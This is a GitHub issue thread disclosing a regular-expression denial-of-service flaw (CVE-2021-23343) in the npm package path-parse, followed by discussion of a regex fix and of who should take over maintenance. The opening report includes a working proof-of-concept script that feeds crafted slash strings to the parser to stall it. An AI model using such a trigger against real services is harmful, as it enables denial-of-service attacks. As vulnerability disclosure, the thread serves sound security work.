ReDoS in path-parse

[yetingli]

Hi,

I would like to report two Regular Expression Denial of Service (REDoS) vulnerabilities in path-parse.

It allows cause a denial of service when parsing crafted invalid paths.

You can execute the code below to reproduce the vulnerability.​

var pathParse = require('path-parse');
function build_attack(n) {
    var ret = ""
    for (var i = 0; i < n; i++) {
        ret += "/"
    }
    return ret + "◎";
}

for(var i = 1; i <= 5000000; i++) {
    if (i % 10000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        pathParse(attack_str);
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
 }
}

Feel free to contact me if you have any questions.

Best regards,
Yeting Li​​​​

[ljharb]

CVE link: https://nvd.nist.gov/vuln/detail/CVE-2021-23343

[n8ores]

Is there any update on patching this vulnerability? This is a core NPM package that is heavily used by many other packages and I foresee a lot of failing pipelines now that this has a CVE logged.

[n8ores]

I have emailed @jbgutierrez to see if he would be willing to patch this, but have not yet received a response.

[jbgutierrez]

I'm willing to transfer this repo to anyone interested in its maintenance. Would you?

[cameron-martin]

If there aren't any other takers, I would be happy to maintain it, since the organisation that I work for, ForgeRock, also has interest in this package not having security vulnerabilities.

Alternatively, having multiple maintainers may be a good idea, for a higher chance of changes like this being made.

[ljharb]

@jbgutierrez i will be happy to take it on, since resolve relies on it. it could also live in the browserify org if that’s preferred.

[jeffrey-pinyan-ithreat]

I have an extensive history with regexes from my Perl days. Even though node doesn't support (?>...), I can think of one quick solution, which is replacing [\s\S]*? with a more specific pattern.

[jeffrey-pinyan-ithreat]

#10 https://github.com/jeffrey-pinyan-ithreat/path-parse fixes the problem without breaking any tests.

[jeffrey-pinyan-ithreat]

The regexes could stand a bit more tweaking to make them a little simpler.

(\/?|) is redundant and should just be (\/?), for example.

[victory-glitch]

@jbgutierrez @ljharb Is there any update on fixing this vulnerability? There is already a PR open to fix this and there doesn't seem to be anyone disagreeing with the fix, so can we merge the PR and deploy v1.0.7 to get this security issue removed?

The resolve library is using this dependency, and the Angular CLI has started using resolve as a dependency since v11. Our security team does not want open vulnerabilities in our Angular codebase (regardless of its actual potential for misuse, which is the better approach to security anyways), so we are delaying on Angular v10 to avoid triggering this on our security scans.

[ljharb]

@hareharey as soon as I'm handed the repo/commit bit, and also the npm publish rights, I'd be happy to take care of it.